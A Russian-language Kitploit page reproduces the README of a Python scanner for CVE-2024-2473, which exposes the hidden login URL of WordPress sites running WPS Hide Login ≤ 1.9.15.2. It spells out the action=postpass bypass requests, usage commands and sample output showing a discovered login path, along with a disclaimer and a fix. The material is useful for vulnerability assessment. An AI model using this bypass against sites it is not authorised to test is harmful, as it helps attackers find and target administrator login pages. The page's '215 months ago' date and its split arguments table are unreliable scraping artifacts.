Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-2473 — Wordpress Hidden Login Page Disclosure. Detect Login Page Disclosure in WordPress sites running WPS Hide Login ≤ 1.9.15.2 (CVE-2024-2473) | Kitploit
Инструменты/GitHubGitHub/m4xsec/cve-2024-2473
ReconnaissanceVulnerability ScannersExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubm4xsec/cve-2024-2473

CVE-2024-2473

Wordpress Hidden Login Page Disclosure. Detect Login Page Disclosure in WordPress sites running WPS Hide Login ≤ 1.9.15.2 (CVE-2024-2473)

Репозиторий
215 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-2473 — Обнаружение скрытой страницы входа WPS Hide Login

Профессиональный сканер на Python для обнаружения раскрытия страницы входа на сайтах WordPress с WPS Hide Login ≤ 1.9.15.2

Python CVE CVSS License Platform

Написан Venexy


Содержание

  • Обзор
  • Сведения об уязвимости
  • Как это работает
  • Требования
  • Установка
  • Использование
  • Пример вывода
  • Отказ от ответственности
  • Ссылки

Обзор

WPS Hide Login — популярный плагин WordPress, позволяющий администраторам изменить стандартный URL /wp-login.php на кастомный скрытый путь, что реализует защиту через сокрытие.

Этот сканер обнаруживает CVE-2024-2473 — уязвимость, при которой параметр action=postpass можно передать для полного обхода механизма защиты плагина, раскрывая URL скрытой страницы входа неаутентифицированным злоумышленникам.


Сведения об уязвимости

Описание

Плагин WPS Hide Login перемещает страницу входа WordPress с адреса по умолчанию /wp-login.php на кастомный URL, выбранный администратором. Однако во всех версиях, вплоть до 1.9.15.2, передача параметра запроса action=postpass на /wp-login.php или /wp-admin/ обходит эту защиту, раскрывая фактический URL действия скрытой формы входа — тем самым злоумышленник без аутентификации узнаёт секретный путь входа.


Как это работает

Сканер воспроизводит процесс атаки в три фазы:

root@kitploit:~
Фаза 1  ─►  Подтвердить, что цель является установкой WordPress
                  │
                  ▼
Фаза 2a ─►  POST /wp-login.php?action=postpass
             с телом: action=lostpassword&post_password=test
             Проверка: HTTP 200 + наличие lostpasswordform + отсутствие wp-login.php в теле
             Извлечение URL скрытого входа из атрибута action формы
                  │
Фаза 2b ─►  POST /wp-admin/?action=postpass
             Проверка: HTTP 302 редирект на location, содержащий reauth=1 или /login
                  │
                  ▼
             Сообщить URL скрытого входа, если найден

Если любая из фаз 2a или 2b совпадает, цель помечается как уязвимая.


Требования

  • Python 3.7 или выше
  • Библиотека requests

Установка

1. Клонировать репозиторий

root@kitploit:~
git clone https://github.com/m4xsec/CVE-2024-2473.git
cd CVE-2024-2473

2. Установить зависимости

root@kitploit:~
pip install requests

Примечание: В системах с виртуальным окружением Python или Kali Linux может потребоваться:

root@kitploit:~
pip install requests --break-system-packages

Использование

root@kitploit:~
python CVE-2024-2473.py -u <TARGET_URL> [-t TIMEOUT]

Аргументы

АргументОписаниеЗначение по умолчанию
-u, --url

Примеры

root@kitploit:~
# Базовое сканирование
python CVE-2024-2473.py -u https://example.com

# Сканирование с кастомным таймаутом
python CVE-2024-2473.py -u https://example.com --timeout 15

# Сканирование через HTTP
python CVE-2024-2473.py -u http://192.168.1.100

Пример вывода

root@kitploit:~
 ...

  ┌─────────────────────────────────────────────────────────────┐
  │  CVE-2024-2473  •  WPS Hide Login Page Identifier           │
  │  Coded by Venexy | https://github.com/m4xsec               │
  └─────────────────────────────────────────────────────────────┘

  ===============================================================
    TARGET    https://example.com
    TIME      2024-11-01 18:00:00
    TIMEOUT   10s
  ===============================================================

  [18:00:00] [*] Phase 1 | Fingerprinting WordPress installation ...
  [18:00:01] [+] WordPress confirmed — https://example.com

  [18:00:01] [*] Phase 2 | Testing CVE-2024-2473 bypass vectors ...

  [18:00:01] [*] Vector A | POST /wp-login.php?action=postpass
             +- Status : 200   Result : MATCH

  [18:00:02] [*] Vector B | POST /wp-admin/?action=postpass
             +- Status : 302   Result : MATCH

  ###############################################################
  ##           VULNERABILITY CONFIRMED  --  CVE-2024-2473      ##
  ###############################################################

    Plugin          WPS Hide Login <= 1.9.15.2
    Severity        Medium (CVSS 5.3 / EPSS 93rd percentile)
    CWE             CWE-200 — Exposure of Sensitive Information
    CVSS Vector     AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:N / A:N

  [18:00:02] [VULN] Bypass confirmed via /wp-login.php?action=postpass

  ====================================================
        HIDDEN LOGIN URL DISCOVERED
  ====================================================

  >>  https://example.com/my-secret-admin-path/

  ====================================================

Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей.

Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. Всегда получайте явное письменное разрешение от владельца целевой системы перед проведением любой оценки безопасности. Несанкционированное сканирование или эксплуатация систем незаконны и неэтичны.

Используйте ответственно.


Ссылки


Написано с ❤️ Venexy Venexy

Если этот инструмент помог вам, поставьте репозиторию ⭐🌟🌟🌟

Скачать инструмент
ПолеПодробности
CVE IDCVE-2024-2473
ЗатронутоПлагин WPS Hide Login ≤ 1.9.15.2 для WordPress
СерьёзностьСредняя
CVSS Score5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
CWECWE-200 — Раскрытие конфиденциальной информации
EPSS Score0.10433 (93-й перцентиль)
Требуется аутентификацияНет
ВендорWPServeur
УстранениеОбновить плагин до версии > 1.9.15.2
Базовый URL целевого WordPress (обязательно)
—
-t, --timeoutТаймаут HTTP-запроса в секундах10
РесурсСсылка
NVD — CVE-2024-2473https://nvd.nist.gov/vuln/detail/CVE-2024-2473
Уведомление Wordfencehttps://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-hide-login/wps-hide-login-19152-login-page-disclosure
Плагин WPS Hide Loginhttps://wordpress.org/plugins/wps-hide-login/
CWE-200https://cwe.mitre.org/data/definitions/200.html
Калькулятор CVSS 3.1https://www.first.org/cvss/calculator/3.1